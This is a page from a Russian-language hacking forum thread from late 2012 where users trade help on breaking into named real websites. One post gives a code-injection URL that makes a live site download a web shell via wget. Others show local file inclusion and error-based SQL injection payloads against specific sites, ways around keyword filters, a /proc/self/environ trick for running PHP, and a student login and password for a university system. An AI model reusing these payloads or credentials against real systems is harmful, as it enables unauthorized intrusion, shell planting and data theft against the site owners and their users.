Старый 28.11.2012, 22:48   #2541
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

http://ecoportal.su/images/111.php
Код:
http://ecoportal.su/marketing.php?parent=%24{%40system%28$_GET[c]%29}&c=wget+shell+-O+./images/111.php
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 28.11.2012, 23:07   #2542
zenon3
 
Регистрация: 14.11.2012
Сообщений: 4
Репутация: 0
По умолчанию

все разобрался! Всем спасибо за подсказку

Последний раз редактировалось zenon3; 28.11.2012 в 23:18..
zenon3 вне форума   Ответить с цитированием
Старый 02.12.2012, 05:05   #2543
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Есть у кого идеи как залить шелл?
Имеется lfi
http://ser[antigoogle]vices.ug[antigoogle]rasu.ru/?d=3&nid=../../../../../../../../../../windows/win.ini%00&PageId=1
Login:EDU\Stud
Pass:Qwe123

phpinfo
http://servi[antigoogle]ces.ugr[antigoogle]asu.ru/develop/test.php
z0mbie вне форума   Ответить с цитированием
Старый 03.12.2012, 19:13   #2544
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Помогите обойти фильтр на select, from...
webSPELL CMS Version: 4.2.1b

http://lol[antigoogle]panic.ru/index.php?site=movies&action=show&id=1 or 1 group by mid(version(),rand(0)|0,64) having avg(0)#
cat1vo вне форума   Ответить с цитированием
Старый 05.12.2012, 00:23   #2545
Сергей Бардюр
 
Регистрация: 27.09.2012
Сообщений: 10
Репутация: 0
По умолчанию

Здравствуйте товарищи, пару вопросов имеется по SQL уязвимостям, первый, имеем SQL в таком запросе:
Код:
INSERT into table(value1,value2,value3,value4) values('text1','SQL','text3','text4') бла бла бла
Извиняюсь, URL уязвимый не могу привести, но думаю для профессионалов в запросе и так всё понятно.
Никак не получается пропихнуть туда свой любимый SQL запрос:
'+or+(@:=1)||@+group+by+concat(@@version,@:=@-1)having+@||min(@:=0)+--+1
Как бы я не старался, он не проходит, и 'and (@:=1)||@+group+by+concat(@@version,@:=@-1)having+@||min(@:=0) and' всякие конструкции пробовал, для него никак.
Зато прокатывают запросы для updatexml и extractvalue, но увы эти две функции отключены в моем случае, ещё прокатывает запрос через трюк name_const, но через этот способ помоему нереально крутить SQL по нормальному, хоть и дублирую правильно запрос в оба места, всё равно выдаёт ошибку на несоответствие.
Никогда не получалось к сожалению через name_const раскручивать SQL, хотя если память не изменяет, то через name_const вроде бы был трюк, запихивающий запрос в одну переменную, и подставляя её в два значения, таким образом все запросы вроде бы работали, если у кого этот запрос рабочий есть через name_const, буду очень признателен.
То есть, если есть нормальная методика выполнения запросов через name_const по конструкции: select 1 from 2 where 3=4 limit 5, то соответственно вопрос по вставке конкретного SQL запроса в вышеописанный пример решён, а если через name_const нельзя по нормальному крутить, тогда нужно как то вставить удобный запрос вывода информации в приведенный выше кусок уязвимого SQL запроса.


И второй вопрос, зашёл в тупиковую позицию, раскручиваю SQL в REQUEST_URI, выполняю такой запрос:
select(user)from(table)where(group=0x61646D696E), а вот оператора limit то запихнуть сюда и не могу, конструкция /**/ не помогает... в таблице нету колонок с primary key, как вывести по одной записи из таблицы в данном случае я не могу придумать.
Так же буду сильно благодарен за помощь, если может какие операторы ещё есть альтернативные, что то по типу offset (но его конечно в mysql нету).
Сергей Бардюр вне форума   Ответить с цитированием
Старый 05.12.2012, 03:33   #2546
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Сергей Бардюр,
1. Вот здесь v1d0q предложил рабочий способ, пробуйте!
2.
Цитата:
select(user)from(table)where(group=0x61646D696E)
having(id>1)and(id<3)

Последний раз редактировалось cat1vo; 05.12.2012 в 18:14..
cat1vo вне форума   Ответить с цитированием
Старый 10.12.2012, 15:14   #2547
Consistent
 
Регистрация: 06.12.2010
Сообщений: 25
Репутация: 0
По умолчанию

Помогите обойти фильтр на селект в ColdFusion CMS.Уязвимость есть, версию выводит, но если вставить в запрос select то выдет пустую страницу. Без него нереально крутить. Надеюсь на вашу помощь.
Consistent вне форума   Ответить с цитированием
Старый 12.12.2012, 12:50   #2548
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

что можно сделать с таким инклудом?

http://www.cateringpage.com/index.php?page=LFIRFI

фильтр+сконца спереди мешают
aspi вне форума   Ответить с цитированием
Старый 12.12.2012, 14:36   #2549
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от aspi Посмотреть сообщение
что можно сделать с таким инклудом?

http://www.cateringpage.com/index.php?page=LFIRFI

фильтр+сконца спереди мешают
=\
Post
Код:
page=../../../../../../../../../../proc/self/environ%00
Cookie: <?php PHPCODE; ?>
Фильтр на eval,phpinfo обходи своим умом
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 12.12.2012, 17:04   #2550
devv
 
Регистрация: 08.10.2012
Сообщений: 27
Репутация: -4
По умолчанию

https://www.h2owirelessnow.com/pageControl.php?page=planDetail&p_code=PLNH30'+ord er+by+4--
Немогу никак раскрутить, помогите кому не сложно, колонок 6 штук, вывода информации добиться не могу
devv вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot